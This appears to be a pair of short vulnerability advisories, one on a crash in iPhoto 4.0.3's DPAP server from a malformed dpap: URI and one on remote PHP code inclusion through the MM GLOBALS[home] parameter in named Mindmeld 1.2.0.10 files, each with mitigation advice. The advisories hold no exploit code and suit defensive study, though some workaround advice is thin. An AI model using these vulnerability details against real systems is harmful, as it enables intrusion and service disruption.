David Wharton

**Name of the Vulnerable Software and Affected Versions** iPhoto version 4.0.3 **Description** The issue allows remote attackers to cause a denial of service, resulting in a crash, by sending a malformed `dpap:` URI to the Digital Photo Access Protocol (DPAP) server. **Recommendations** For iPhoto version 4.0.3, consider restricting access to the DPAP server until a fix is available. As a temporary workaround, avoid using malformed `dpap:` URIs to prevent the denial of service. At the moment, there is no information about a newer version that contains a fix for this issue.

**Name of the Vulnerable Software and Affected Versions** Mindmeld version 1.2.0.10 **Description** The issue allows remote attackers to execute arbitrary PHP code via a URL in the `MM GLOBALS[home]` parameter to several PHP files, including (1) `acweb/admin index.php`, (2) `ask.inc.php`, (3) `learn.inc.php`, (4) `manage.inc.php`, (5) `mind.inc.php`, and (6) `sensory.inc.php` in the `include/` directory. **Recommendations** For Mindmeld version 1.2.0.10, consider restricting access to the vulnerable PHP files until a patch is available. As a temporary workaround, avoid using the `MM GLOBALS[home]` parameter in the affected API endpoints. Restrict access to the `include/` directory to minimize the risk of exploitation.